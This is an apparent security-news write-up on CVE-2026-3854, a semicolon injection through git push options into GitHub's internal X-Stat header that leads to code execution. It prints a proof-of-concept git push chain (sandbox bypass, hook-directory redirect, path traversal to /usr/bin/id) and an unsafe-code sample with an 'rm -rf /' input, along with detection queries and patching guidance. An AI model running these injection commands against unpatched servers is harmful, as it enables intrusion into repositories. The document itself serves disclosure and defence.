CVE-2026-3854: One —From Zero to GitHub RCE—How a Single Semicolon Hijacked Millions of Repositories + Video

Listen to this Post

Featured Image

Introduction

GitHub’s internal git infrastructure, which processes every push, relies on a chain of services (babeld, gitauth, gitrpcd and a pre‑receive hook) that exchange security‑critical metadata via a semicolon‑delimited header named X‑Stat. Wiz Research discovered that user‑supplied `git push` option values were placed verbatim into this header without sanitizing the semicolon delimiter, enabling an attacker to inject arbitrary fields and ultimately execute code on GitHub’s backend servers.

Learning Objectives

  • Understand how unchecked user input in an internal protocol can be chained into remote code execution.
  • Learn the exploitation path: sandbox bypass → hook directory redirection → path traversal to arbitrary command execution.
  • Acquire hands‑on commands to audit similar injection vulnerabilities, verify patch status, and harden CI/CD pipelines.

You Should Know

1. Anatomy of the X-Stat Header Injection

The vulnerability stemmed from the way babeld, GitHub’s git proxy, built the internal X‑Stat header. Push options supplied with `git push -o` were copied as numbered fields (push_option_0, push_option_1, …) without sanitizing the `;` character, which is the header’s field delimiter. Because the header parser uses last‑write‑win semantics, an attacker who injects a semicolon followed by a security‑critical field name (e.g., rails_env=development) can override the legitimate value later in the header.

Step‑by‑step injection example:

 Normal push with two options
git push -o "key1=value1" -o "key2=value2" origin main

Malicious push injecting a semi‑colon and a security field
git push -o "ignoreme;rails_env=development;custom_hooks_dir=/tmp/malicious" origin main

The resulting X‑Stat header fragment becomes:
 push_option_0=ignoreme;rails_env=development;custom_hooks_dir=/tmp/malicious;push_option_1=...

This simple trick allowed the attacker to plant environment and configuration directives into a header that downstream services – gitrpcd and the pre‑receive hook – trusted unconditionally.

Linux / macOS command to monitor local git traffic (for lab testing):

 Capture git push traffic on a test instance (requires local git daemon)
GIT_TRACE=1 GIT_CURL_VERBOSE=1 git push -o "test;injected" origin main 2>&1 | tee capture.log

2. Chaining the Exploit: From Injection to RCE

The exploit chains three injected fields to achieve unsandboxed code execution as the `git` user on both GitHub Enterprise Server (GHES) and GitHub.com.

  1. Sandbox bypass – Override `rails_env` to a non‑production value. The pre‑receive hook binary contains two code paths: a sandboxed one for production and an unsandboxed, direct‑execution path for any other environment. Injecting `rails_env=development` forces the unsandboxed path.

  2. Redirect the hook directory – Override `custom_hooks_dir` to point to an attacker‑controlled directory (e.g., /tmp/malicious). The binary will look for hook scripts there.

  3. Path traversal to arbitrary binary – Override `repo_pre_receive_hooks` with a crafted hook entry that contains a path traversal sequence (e.g., ../../../usr/bin/id). The binary resolves the path, joins it with the attacker‑controlled base directory, and executes the resolved binary without any arguments or sandbox restrictions.

Full exploitation command (simplified PoC structure):

git push -o "dummy;rails_env=development" \
-o "dummy;custom_hooks_dir=/tmp/malicious" \
-o "dummy;repo_pre_receive_hooks={\"hooks\":[{\"script\":\"../../../usr/bin/id\"}]}" \
origin main

On GHES this yields immediate command output (e.g., uid=991(git) …). On GitHub.com the same chain works after also injecting `enterprise_mode=true` to activate the custom hooks path that is normally disabled.

3. AI‑Augmented Reverse Engineering with IDA MCP

Wiz researchers were able to find this vulnerability because they leveraged AI‑augmented tooling – specifically IDA MCP – to reverse engineer GitHub’s compiled black‑box binaries at scale. Traditional manual reverse engineering of the entire git pipeline would have been prohibitively time‑consuming. By using an LLM‑powered assistant that bridges IDA Pro with language models, they rapidly reconstructed internal protocols and identified where user input could influence server behaviour.

For security teams who want to adopt similar techniques:

 Install IDA MCP (requires IDA Pro 9.0+ and Python)
pip uninstall ida-pro-mcp
pip install git+https://github.com/mrexodia/ida-pro-mcp

Run the MCP server inside IDA (File -> Script File -> ida_mcp_server.py)
 Then use a compatible LLM client to query the binary’s decompiled code.

This approach is not limited to GitHub – any organization that relies on closed‑source binaries in their supply chain can use AI‑assisted reverse engineering to uncover hidden injection points, insecure protocol parsers, or hardcoded secrets.

Windows CLI alternative (using WinDbg for dynamic analysis):

 Attach to a process and monitor API calls (example for git.exe)
windbg -pn git.exe
 Set a breakpoint on CreateProcess to detect unsanitised arguments
bp kernel32!CreateProcessW
g
  1. Impact Assessment: Cross‑Tenant Exposure and Full Server Compromise

– On GitHub.com: Code execution lands on a shared storage node running as the `git` user. By design, this user has broad filesystem access to all repositories hosted on that node. Wiz researchers enumerated repository index entries and found millions of entries belonging to other users and organisations. Although the researchers did not read third‑party content, they confirmed that the filesystem permissions would allow such access.
– On GHES: The same exploit grants full server compromise – read/write access to every repository, internal service configuration, and the ability to pivot to other nodes within the enterprise network.

Telemetry query to detect potential exploitation (using GitHub’s audit log):

 On GHES, review audit logs for anomalous push options
sudo grep -E "push_option.;" /var/log/github-audit.log | grep -E "rails_env|custom_hooks_dir|repo_pre_receive_hooks"

5. Mitigation and Patch Status

  • GitHub.com: Fixed on March 4, 2026 within six hours of the report. No user action is required.
  • GitHub Enterprise Server: Patched versions are available. 88% of instances remained vulnerable at the time of public disclosure (April 28, 2026). Administrators must upgrade immediately.

Patched versions:

  • 3.14.25 (or later)
  • 3.15.20 (or later)
  • 3.16.16 (or later)
  • 3.17.13 (or later)
  • 3.18.8 (or later)
  • 3.19.4 (or later)
  • 3.20.0 (or later)

Step‑by‑step upgrade command on GHES:

 SSH into your GHES instance as admin
ssh admin@your-ghes-instance

Check current version
ghe-version

Upgrade to the latest patch release (example for 3.19.x)
sudo ghe-update --version 3.19.4

Verify the upgrade
ghe-version

Wiz customers can use the pre‑built query in the Wiz Threat Center to identify vulnerable GHES instances in their environment.

6. Defensive Measures: Hardening CI/CD and Internal Protocols

Beyond patching, this vulnerability highlights a systemic issue that affects any multi‑service architecture where user input flows through a shared internal protocol. Security teams should audit such designs for similar injection flaws.

Linux command to scan git push option usage in CI/CD scripts:

 Search for git push -o usages that might embed arbitrary variables
grep -r "git push.-o" .github/workflows/ .gitlab-ci.yml Jenkinsfile

Defensive code patterns (pseudocode):

function sanitize_push_option(value):
 Remove any characters that could act as delimiters in internal headers
return value.replace(";", "").replace("\n", "").replace("\r", "")

In the internal header builder
for each user_option:
safe_option = sanitize_push_option(user_option)
header += "push_option_" + str(i) + "=" + safe_option + ";"

Windows PowerShell command to monitor for suspicious git processes:

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object { $_.Message -match "git push -o" } | Format-List

Cloud hardening tip (Azure DevOps / AWS CodeCommit):

  • Place a web application firewall (WAF) or API gateway in front of your git endpoints. Configure rules to block push option values that contain semicolons, backticks, `$(` , or other shell‑metacharacters.

7. Broader Implications for Git‑Based Supply Chains

CVE-2026-3854 is not an isolated incident. Similar command injection vulnerabilities have been found in:
– Tekton Pipelines – where unsanitised revision parameters allowed `git fetch –upload-pack` injection.
– GitPython – unsafe handling of keyword arguments that bypassed the library’s security filters.
– Ungit – argument injection via the `/api/fetch` endpoint.

Auditing your own code for argument injection (Python example):

import subprocess

UNSAFE: user input directly concatenated into command string
branch = user_input  may contain "; rm -rf /"
subprocess.run(f"git push origin {branch}", shell=True)

SAFE: use argument list, never use shell=True
subprocess.run(["git", "push", "origin", branch], shell=False)

Windows equivalent (C):

// UNSAFE
Process.Start("cmd.exe", "/c git push origin " + userInput);

// SAFE
ProcessStartInfo psi = new ProcessStartInfo("git", $"push origin {userInput}");
psi.UseShellExecute = false;
Process.Start(psi);

What Undercode Say

  • Assumptions across trust boundaries are the new injection vectors. Each service trusted the X‑Stat header completely, and each team’s reasonable assumption became a lethal chain when combined.
  • AI‑augmented reverse engineering is a game changer for zero‑day research. Traditional black‑box audits of complex systems like GitHub’s git pipeline would have taken months; IDA MCP reduced that to days. Defenders must assume attackers will use the same tools.

Prediction

Over the next 12 months, we will see a sharp rise in vulnerabilities discovered through AI‑assisted reverse engineering of closed‑source components, especially in cloud provider internal APIs and CI/CD systems. Organisations will need to shift from perimeter‑based defenses to protocol‑level input validation across every service boundary. The era of “trusted internal headers” is ending – every field that user input can touch must be treated as attacker‑controlled, regardless of how deep it sits inside the stack.

▶️ Related Video (78% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky